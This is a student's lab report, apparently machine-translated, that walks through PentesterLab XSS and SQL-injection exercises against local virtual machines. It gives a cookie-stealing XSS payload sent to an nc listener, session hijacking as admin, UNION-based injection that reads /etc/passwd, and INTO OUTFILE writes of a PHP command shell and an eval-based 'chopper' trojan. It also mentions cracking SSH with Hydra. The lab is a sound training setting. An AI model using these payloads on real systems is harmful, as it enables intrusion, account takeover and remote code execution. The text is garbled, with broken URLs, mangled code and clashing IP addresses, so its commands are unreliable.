Wu Zekun 201521430028 Lab 5

For SQL injection attacks against the target, see

Https://pentesterlab.com/exercises/from_sqli_to_shell/course

Http://www.sohu.com/a/126855490_472906

For the XSS target attack process, see

Https://pentesterlab.com/exercises/xss_and_mysql_file/course

Open the webpage on 192.168.179.129:

Is a blog system.

Each blog title can be evaluated below:

Test whether the XSS vulnerability exists.

A dialog box is displayed after submission:

Further construct content

<SCRIPT> document. Write (' '); </SCRIPT>
At the same time, open port 80 with NC on 192.168.179.142.

Log on to the admin account on the original machine with the password p4ssw0rd

Log in and view the comment topic just published.

Then, on the machine 142, view the NC returned content.

Obtain cookie information.

Copy the cookie and open the webpage where the comment is located on machine 142. And modify the cookie value to the copied value.

Refresh the page and find that you have logged on to the page as admin.

After entering the management interface, you will find that the blog editing interface has the SQL injection vulnerability.

Http: // 192.168.179.20./ admin/edit. php? Id = 4 union select 1, 2, 4

2 and 3 are displayed.

 

 

Http: // 192.168.179.20./ admin/edit. php? Id = 0 Union select 1, 2, load_file ("/etc/passwd"), 4

Attackers can read passwd files but cannot read shadow files. We try to create a file.

The/var/www/classes directory is found in the error prompt on the editing page,

 

 

The CSS directory is found when you view the source code.

The/var/www/CSS directory is writable.

Then construct the statement:

Http: // 192.168.179.130/admin/edit. php? Id = 2% 20 Union % 20 select % 20%, into % 20 OUTFILE % 22/var/www/CSS/S. php % 22

Then open

Http: // 192.168.179.130/CSS/S. php

Display:

The S. php file is successfully written to the/var/www/CSS directory.

<? PHP system ($ _ Get ['C']);?>

Write to Z. php and construct the URL:

Http: // 192.168.179.130/admin/edit. php? Id = 2% 20 Union % 20 select % 22%, % 3C? PHP % 20 system ($ _ Get [% 27C % 27]); % 20? % 3E % 22,4% 20 into % 20 OUTFILE % 20% 22/var/www/CSS/Z. php % 22

Access Z. php and use uname-a to obtain system information. Attackers can remotely execute commands.

The following code writes a Trojan to construct a URL:

Http: // 192.168.179.130/admin/edit. php? Id = 2% 20 Union % 20 select % 22%, % 3C? PHP % [email protected] ($ _ post [% 27 chopper % 27]);? % 3E % 22,4% 20 into % 20 OUTFILE % 20% 22/var/www/CSS/Dao. php % 22

Kitchen Knife link:

We found that the machine had SSH enabled, so we used Hydra to crack it:

 

SSH Login

Wu Zekun 201521430028 Lab 5